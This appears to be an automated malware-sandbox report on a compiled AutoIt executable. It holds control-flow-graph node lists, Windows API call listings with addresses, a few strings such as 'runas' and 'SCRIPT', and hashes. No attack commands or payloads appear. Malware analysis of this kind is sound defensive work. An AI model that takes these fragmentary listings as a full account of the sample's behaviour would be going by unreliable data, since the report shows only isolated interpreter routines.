106984->107136 106986->106947 106986->106968 107129 fd9d3c 60 API calls Mailbox 106987->107129 106989 fdb22d 107130 fd9d3c 60 API calls Mailbox 106989->107130 106991->106970 106996 103d0a5 106995->106996 106997 103d09a 106995->106997 107001 fd7667 59 API calls 106996->107001 107040 103d17f Mailbox 106996->107040 106998 fd9b3c 59 API calls 106997->106998 106998->106996 106999 ff0db6 Mailbox 59 API calls 107000 103d1c8 106999->107000 107005 103d1d4 107000->107005 107141 fd57a6 60 API calls Mailbox 107000->107141 107002 103d0c9 107001->107002 107004 fd7667 59 API calls 107002->107004 107007 103d0d2 107004->107007 107006 fd9837 84 API calls 107005->107006 107008 103d1ec 107006->107008 107009 fd9837 84 API calls 107007->107009 107010 fd57f6 67 API calls 107008->107010 107011 103d0de 107009->107011 107012 103d1fb 107010->107012 107013 fd459b 59 API calls 107011->107013 107014 103d233 107012->107014 107015 103d1ff GetLastError 107012->107015 107016 103d0f3 107013->107016 107020 103d295 107014->107020 107021 103d25e 107014->107021 107018 103d218 107015->107018 107017 fd7b2e 59 API calls 107016->107017 107019 103d126 107017->107019 107037 103d188 Mailbox 107018->107037 107142 fd58ba CloseHandle 107018->107142 107022 103d178 107019->107022 107027 1033c37 3 API calls 107019->107027 107023 ff0db6 Mailbox 59 API calls 107020->107023 107024 ff0db6 Mailbox 59 API calls 107021->107024 107026 fd9b3c 59 API calls 107022->107026 107028 103d29a 107023->107028 107029 103d263 107024->107029 107026->107040 107030 103d136 107027->107030 107033 fd7667 59 API calls 107028->107033 107028->107037 107031 103d274 107029->107031 107034 fd7667 59 API calls 107029->107034 107030->107022 107032 103d13a 107030->107032 107143 104fbce 59 API calls 2 library calls 107031->107143 107036 fd7de1 59 API calls 107032->107036 107033->107037 107034->107031 107038 103d147 107036->107038 107037->106970 107140 1033a2a 63 API calls Mailbox 107038->107140 107040->106999 107040->107037 107041 103d150 Mailbox 107041->107022 107043 104cadd 130 API calls 107042->107043 107044 104df33 107043->107044 107044->106970 107046 fd9a98 59 API calls 107045->107046 107047 fe1fdb 107046->107047 107049 ff0db6 Mailbox 59 API calls 107047->107049 107051 1016585 107047->107051 107050 fe1ff4 107049->107050 107053 fe2004 107050->107053 107159 fd57a6 60 API calls Mailbox 107050->107159 107052 fe2029 107051->107052 107163 103f574 59 API calls 107051->107163 107056 fd9b3c 59 API calls 107052->107056 107061 fe2036 107052->107061 107055 fd9837 84 API calls 107053->107055 107057 fe2012 107055->107057 107058 10165cd 107056->107058 107059 fd57f6 67 API calls 107057->107059 107060 10165d5 107058->107060 107058->107061 107062 fe2021 107059->107062 107064 fd9b3c 59 API calls 107060->107064 107063 fd5cdf 2 API calls 107061->107063 107062->107051 107062->107052 107162 fd58ba CloseHandle 107062->107162 107066 fe203d 107063->107066 107064->107066 107067 10165e7 107066->107067 107068 fe2057 107066->107068 107070 ff0db6 Mailbox 59 API calls 107067->107070 107069 fd7667 59 API calls 107068->107069 107071 fe205f 107069->107071 107072 10165ed 107070->107072 107144 fd5572 107071->107144 107074 1016601 107072->107074 107164 fd5850 ReadFile SetFilePointerEx 107072->107164 107079 1016605 _memmove 107074->107079 107165 10376c4 59 API calls 2 library calls 107074->107165 107077 fe206e 107077->107079 107160 fd9a3c 59 API calls Mailbox 107077->107160 107080 fe2082 Mailbox 107081 fe20bc 107080->107081 107082 fd5c6f CloseHandle 107080->107082 107081->106970 107083 fe20b0 107082->107083 107083->107081 107161 fd58ba CloseHandle 107083->107161 107086 fd7667 59 API calls 107085->107086 107087 104c2f4 107086->107087 107088 fd7667 59 API calls 107087->107088 107089 104c2fc 107088->107089 107090 fd7667 59 API calls 107089->107090 107091 104c304 107090->107091 107092 fd9837 84 API calls 107091->107092 107094 104c312 107092->107094 107093 104c528 Mailbox 107093->106970 107094->107093 107095 fd7bcc 59 API calls 107094->107095 107096 fd7924 59 API calls 107094->107096 107097 104c4fb 107094->107097 107098 104c4e2 107094->107098 107100 104c4fd 107094->107100 107103 fd8047 59 API calls 107094->107103 107107 fd7e4f 59 API calls 107094->107107 107109 fd7e4f 59 API calls 107094->107109 107114 fd9837 84 API calls 107094->107114 107115 fd7cab 59 API calls 107094->107115 107116 fd7b2e 59 API calls 107094->107116 107095->107094 107096->107094 107097->107093 107170 fd9a3c 59 API calls Mailbox 107097->107170 107101 fd7cab 59 API calls 107098->107101 107102 fd7cab 59 API calls 107100->107102 107104 104c4ef 107101->107104 107106 104c50c 107102->107106 107103->107094 107105 fd7b2e 59 API calls 107104->107105 107105->107097 107108 fd7b2e 59 API calls 107106->107108 107110 104c3a9 CharUpperBuffW 107107->107110 107108->107097 107111 104c469 CharUpperBuffW 107109->107111 107169 fd843a 68 API calls 107110->107169 107113 fdc5a7 69 API calls 107111->107113 107113->107094 107114->107094 107115->107094 107116->107094 107118 1037962 107117->107118 107119 ff0db6 Mailbox 59 API calls 107118->107119 107120 1037970 107119->107120 107121 103797e 107120->107121 107122 fd7667 59 API calls 107120->107122 107121->106970 107122->107121 107171 10260c0 107123->107171 107125 102618c 107125->106970 107126->106969 107127->106969 107128->106970 107129->106989 107130->106979 107131->106949 107132->106970 107133->106958 107134->106986 107135->106986 107136->106986 107137->106968 107138->106975 107139->106968 107140->107041 107141->107005 107142->107037 107143->107037 107145 fd557d 107144->107145 107146 fd55a2 107144->107146 107145->107146 107150 fd558c 107145->107150 107147 fd7d8c 59 API calls 107146->107147 107151 103325e 107147->107151 107148 103328d 107148->107077 107152 fd5ab8 59 API calls 107150->107152 107151->107148 107166 10331fa ReadFile SetFilePointerEx 107151->107166 107167 fd7924 59 API calls 2 library calls 107151->107167 107153 103337e 107152->107153 107155 fd54d2 61 API calls 107153->107155 107156 103338c 107155->107156 107158 103339c Mailbox 107156->107158 107168 fd77da 61 API calls Mailbox 107156->107168 107158->107077 107159->107053 107160->107080 107161->107081 107162->107051 107163->107051 107164->107074 107165->107079 107166->107151 107167->107151 107168->107158 107169->107094 107170->107093 107172 10260cb 107171->107172 107173 10260e8 107171->107173 107172->107173 107175 10260ab 59 API calls Mailbox 107172->107175 107173->107125 107175->107172 107176 fd3633 107177 fd366a 107176->107177 107178 fd3688 107177->107178 107179 fd36e7 107177->107179 107220 fd36e5 107177->107220 107183 fd374b PostQuitMessage 107178->107183 107184 fd3695 107178->107184 107181 fd36ed 107179->107181 107182 100d0cc 107179->107182 107180 fd36ca DefWindowProcW 107185 fd36d8 107180->107185 107186 fd3715 SetTimer RegisterWindowMessageW 107181->107186 107187 fd36f2 107181->107187 107225 fe1070 10 API calls Mailbox 107182->107225 107183->107185 107189 100d154 107184->107189 107190 fd36a0 107184->107190 107186->107185 107195 fd373e CreatePopupMenu 107186->107195 107192 fd36f9 KillTimer 107187->107192 107193 100d06f 107187->107193 107230 1032527 71 API calls _memset 107189->107230 107196 fd36a8 107190->107196 107197 fd3755 107190->107197 107221 fd443a Shell_NotifyIconW _memset 107192->107221 107202 100d074 107193->107202 107203 100d0a8 MoveWindow 107193->107203 107194 100d0f3 107226 fe1093 341 API calls Mailbox 107194->107226 107195->107185 107198 100d139 107196->107198 107199 fd36b3 107196->107199 107223 fd44a0 64 API calls _memset 107197->107223 107198->107180 107229 1027c36 59 API calls Mailbox 107198->107229 107206 fd36be 107199->107206 107207 100d124 107199->107207 107200 100d166 107200->107180 107200->107185 107209 100d097 SetFocus 107202->107209 107210 100d078 107202->107210 107203->107185 107206->107180 107227 fd443a Shell_NotifyIconW _memset 107206->107227 107228 1032d36 81 API calls _memset 107207->107228 107208 fd3764 107208->107185 107209->107185 107210->107206 107212 100d081 107210->107212 107211 fd370c 107222 fd3114 DeleteObject DestroyWindow Mailbox 107211->107222 107224 fe1070 10 API calls Mailbox 107212->107224 107218 100d118 107219 fd434a 68 API calls 107218->107219 107219->107220 107220->107180 107221->107211 107222->107185 107223->107208 107224->107185 107225->107194 107226->107206 107227->107218 107228->107208 107229->107220 107230->107200

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FD3B68
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00FD3B7A
                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,010952F8,010952E0,?,?), ref: 00FD3BEB
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                      • Part of subcall function 00FE092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FD3C14,010952F8,?,?,?), ref: 00FE096E
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD3C6F
                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01087770,00000010), ref: 0100D281
                                                                    • SetCurrentDirectoryW.KERNEL32(?,010952F8,?,?,?), ref: 0100D2B9
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01084260,010952F8,?,?,?), ref: 0100D33F
                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0100D346
                                                                      • Part of subcall function 00FD3A46: GetSysColorBrush.USER32(0000000F), ref: 00FD3A50
                                                                      • Part of subcall function 00FD3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00FD3A5F
                                                                      • Part of subcall function 00FD3A46: LoadIconW.USER32(00000063), ref: 00FD3A76
                                                                      • Part of subcall function 00FD3A46: LoadIconW.USER32(000000A4), ref: 00FD3A88
                                                                      • Part of subcall function 00FD3A46: LoadIconW.USER32(000000A2), ref: 00FD3A9A
                                                                      • Part of subcall function 00FD3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FD3AC0
                                                                      • Part of subcall function 00FD3A46: RegisterClassExW.USER32(?), ref: 00FD3B16
                                                                      • Part of subcall function 00FD39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FD3A03
                                                                      • Part of subcall function 00FD39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FD3A24
                                                                      • Part of subcall function 00FD39D5: ShowWindow.USER32(00000000,?,?), ref: 00FD3A38
                                                                      • Part of subcall function 00FD39D5: ShowWindow.USER32(00000000,?,?), ref: 00FD3A41
                                                                      • Part of subcall function 00FD434A: _memset.LIBCMT ref: 00FD4370
                                                                      • Part of subcall function 00FD434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FD4415
                                                                    Strings
                                                                    • This is a third-party compiled AutoIt script., xrefs: 0100D279
                                                                    • runas, xrefs: 0100D33A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                    • API String ID: 529118366-3287110873
                                                                    • Opcode ID: fe9b457c96c3065d57b02f828ae25605364e60ae63fcc8c531b267b5e04b4d5d
                                                                    • Instruction ID: 2085e7ba9787c862204fef01ba17a4c9b360e6d410670c21a825fce01e5ab35b
                                                                    • Opcode Fuzzy Hash: fe9b457c96c3065d57b02f828ae25605364e60ae63fcc8c531b267b5e04b4d5d
                                                                    • Instruction Fuzzy Hash: B7513930D08209AEDF22FBF5DC15AFE7BB6BB05310F084097F5D1A6241DA795605EB21

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 942 fd49a0-fd4a00 call fd7667 GetVersionExW call fd7bcc 947 fd4b0b-fd4b0d 942->947 948 fd4a06 942->948 950 100d767-100d773 947->950 949 fd4a09-fd4a0e 948->949 952 fd4a14 949->952 953 fd4b12-fd4b13 949->953 951 100d774-100d778 950->951 954 100d77a 951->954 955 100d77b-100d787 951->955 956 fd4a15-fd4a4c call fd7d2c call fd7726 952->956 953->956 954->955 955->951 957 100d789-100d78e 955->957 965 100d864-100d867 956->965 966 fd4a52-fd4a53 956->966 957->949 959 100d794-100d79b 957->959 959->950 961 100d79d 959->961 964 100d7a2-100d7a5 961->964 967 100d7ab-100d7c9 964->967 968 fd4a93-fd4aaa GetCurrentProcess IsWow64Process 964->968 969 100d880-100d884 965->969 970 100d869 965->970 966->964 971 fd4a59-fd4a64 966->971 967->968 972 100d7cf-100d7d5 967->972 978 fd4aac 968->978 979 fd4aaf-fd4ac0 968->979 976 100d886-100d88f 969->976 977 100d86f-100d878 969->977 973 100d86c 970->973 974 fd4a6a-fd4a6c 971->974 975 100d7ea-100d7f0 971->975 982 100d7d7-100d7da 972->982 983 100d7df-100d7e5 972->983 973->977 984 100d805-100d811 974->984 985 fd4a72-fd4a75 974->985 986 100d7f2-100d7f5 975->986 987 100d7fa-100d800 975->987 976->973 988 100d891-100d894 976->988 977->969 978->979 980 fd4b2b-fd4b35 GetSystemInfo 979->980 981 fd4ac2-fd4ad2 call fd4b37 979->981 994 fd4af8-fd4b08 980->994 999 fd4b1f-fd4b29 GetSystemInfo 981->999 1000 fd4ad4-fd4ae1 call fd4b37 981->1000 982->968 983->968 989 100d813-100d816 984->989 990 100d81b-100d821 984->990 992 100d831-100d834 985->992 993 fd4a7b-fd4a8a 985->993 986->968 987->968 988->977 989->968 990->968 992->968 996 100d83a-100d84f 992->996 997 100d826-100d82c 993->997 998 fd4a90 993->998 1001 100d851-100d854 996->1001 1002 100d859-100d85f 996->1002 997->968 998->968 1004 fd4ae9-fd4aed 999->1004 1007 fd4b18-fd4b1d 1000->1007 1008 fd4ae3-fd4ae7 GetNativeSystemInfo 1000->1008 1001->968 1002->968 1004->994 1006 fd4aef-fd4af2 FreeLibrary 1004->1006 1006->994 1007->1008 1008->1004
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 00FD49CD
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    • GetCurrentProcess.KERNEL32(?,0105FAEC,00000000,00000000,?), ref: 00FD4A9A
                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00FD4AA1
                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FD4AE7
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00FD4AF2
                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00FD4B23
                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00FD4B2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                    • String ID:
                                                                    • API String ID: 1986165174-0
                                                                    • Opcode ID: 88eeaefa3edb98365c3d96c584dbf3db4e2748c895bcfa1a76f79f65c64c25f9
                                                                    • Instruction ID: 18dbd64c3c0ad944c535d433cb5d67a7ffdbf6bd345fb8e89b7acd5b2da5d2e9
                                                                    • Opcode Fuzzy Hash: 88eeaefa3edb98365c3d96c584dbf3db4e2748c895bcfa1a76f79f65c64c25f9
                                                                    • Instruction Fuzzy Hash: 2391B7319897C1DFD732DBA885501AABFF6AF2A300F48499ED0CA93741D234F508D769

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1039 fd4e89-fd4ea1 CreateStreamOnHGlobal 1040 fd4ec1-fd4ec6 1039->1040 1041 fd4ea3-fd4eba FindResourceExW 1039->1041 1042 100d933-100d942 LoadResource 1041->1042 1043 fd4ec0 1041->1043 1042->1043 1044 100d948-100d956 SizeofResource 1042->1044 1043->1040 1044->1043 1045 100d95c-100d967 LockResource 1044->1045 1045->1043 1046 100d96d-100d98b 1045->1046 1046->1043
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FD4D8E,?,?,00000000,00000000), ref: 00FD4E99
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FD4D8E,?,?,00000000,00000000), ref: 00FD4EB0
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00FD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FD4E2F), ref: 0100D937
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00FD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FD4E2F), ref: 0100D94C
                                                                    • LockResource.KERNEL32(00FD4D8E,?,?,00FD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FD4E2F,00000000), ref: 0100D95F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: 6b54c1a02e4d68be087b9af47bf53fc6b04c274d260cf810d8d60155bb996a22
                                                                    • Instruction ID: 8332356c9bef3459f64b3ef6f1c6e4a228be947b84be4ed29df0c97b8b2d11ad
                                                                    • Opcode Fuzzy Hash: 6b54c1a02e4d68be087b9af47bf53fc6b04c274d260cf810d8d60155bb996a22
                                                                    • Instruction Fuzzy Hash: 0D11A0B5200301BFD7218BA5EC48F2B7BBAFBC5B51F24426DF445C6280DB76E8009761
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,0100E398), ref: 0103446A
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0103447B
                                                                    • FindClose.KERNEL32(00000000), ref: 0103448B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: f30c25717d1d5a2085d3f5ed017963f1d12342bb10c981a999029add2627063e
                                                                    • Instruction ID: dc6cb4684833e28dfced3612052178071a7ed13dedc1eaedb3afa5f8915472b8
                                                                    • Opcode Fuzzy Hash: f30c25717d1d5a2085d3f5ed017963f1d12342bb10c981a999029add2627063e
                                                                    • Instruction Fuzzy Hash: 77E0DF72810A026B9320AA38EC0D8EB779C9E45275F104766F9B5C20D0EFBD99008796
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE0A5B
                                                                    • timeGetTime.WINMM ref: 00FE0D16
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE0E53
                                                                    • Sleep.KERNEL32(0000000A), ref: 00FE0E61
                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00FE0EFA
                                                                    • DestroyWindow.USER32 ref: 00FE0F06
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FE0F20
                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 01014E83
                                                                    • TranslateMessage.USER32(?), ref: 01015C60
                                                                    • DispatchMessageW.USER32(?), ref: 01015C6E
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 01015C82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                    • API String ID: 4212290369-3242690629
                                                                    • Opcode ID: b338c457ec3f6fd9e51e70de6399495e6fae7c78ca477cf13dc0dd82d91fff84
                                                                    • Instruction ID: 1ae15566a6c1ea9762429854e80890b35ec507f061f322d0fbd0c60251f75ae5
                                                                    • Opcode Fuzzy Hash: b338c457ec3f6fd9e51e70de6399495e6fae7c78ca477cf13dc0dd82d91fff84
                                                                    • Instruction Fuzzy Hash: 0CB2D170608381DFD724DF24C894BAEBBE5BF85304F14495DE5C99B291CBB9E884DB82

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 01038F5F: __time64.LIBCMT ref: 01038F69
                                                                      • Part of subcall function 00FD4EE5: _fseek.LIBCMT ref: 00FD4EFD
                                                                    • __wsplitpath.LIBCMT ref: 01039234
                                                                      • Part of subcall function 00FF40FB: __wsplitpath_helper.LIBCMT ref: 00FF413B
                                                                    • _wcscpy.LIBCMT ref: 01039247
                                                                    • _wcscat.LIBCMT ref: 0103925A
                                                                    • __wsplitpath.LIBCMT ref: 0103927F
                                                                    • _wcscat.LIBCMT ref: 01039295
                                                                    • _wcscat.LIBCMT ref: 010392A8
                                                                      • Part of subcall function 01038FA5: _memmove.LIBCMT ref: 01038FDE
                                                                      • Part of subcall function 01038FA5: _memmove.LIBCMT ref: 01038FED
                                                                    • _wcscmp.LIBCMT ref: 010391EF
                                                                      • Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039824
                                                                      • Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039837
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01039452
                                                                    • _wcsncpy.LIBCMT ref: 010394C5
                                                                    • DeleteFileW.KERNEL32(?,?), ref: 010394FB
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01039511
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01039522
                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01039534
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                    • String ID:
                                                                    • API String ID: 1500180987-0
                                                                    • Opcode ID: a2a31e57106a1a2d71892864b56b09186b1884ce79cfae511b7d33ba5680d42e
                                                                    • Instruction ID: aa643aa1bb2c14bdb31f61d6b6893dc32d034dba78d89291f2a4865899266365
                                                                    • Opcode Fuzzy Hash: a2a31e57106a1a2d71892864b56b09186b1884ce79cfae511b7d33ba5680d42e
                                                                    • Instruction Fuzzy Hash: C7C15CB1D00219ABDF21DF94CC81EDEB7BDEF85304F0040A6E649E7251DB749A849F61

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FD3074
                                                                    • RegisterClassExW.USER32(00000030), ref: 00FD309E
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD30AF
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FD30CC
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD30DC
                                                                    • LoadIconW.USER32(000000A9), ref: 00FD30F2
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD3101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-1005189915
                                                                    • Opcode ID: adb9a834dd50ac7d0085b2eb5120d451db634935ebed43fef0a79379170e7a2d
                                                                    • Instruction ID: adbee94d18123be68466955790aa220218cdc00e8aaee33b4d032ea9b8474820
                                                                    • Opcode Fuzzy Hash: adb9a834dd50ac7d0085b2eb5120d451db634935ebed43fef0a79379170e7a2d
                                                                    • Instruction Fuzzy Hash: 2C3129B184130AAFDB618FA5D859ADEBBF4FB09310F14415AF580EA294D3BE0545CF51

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FD3074
                                                                    • RegisterClassExW.USER32(00000030), ref: 00FD309E
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD30AF
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FD30CC
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD30DC
                                                                    • LoadIconW.USER32(000000A9), ref: 00FD30F2
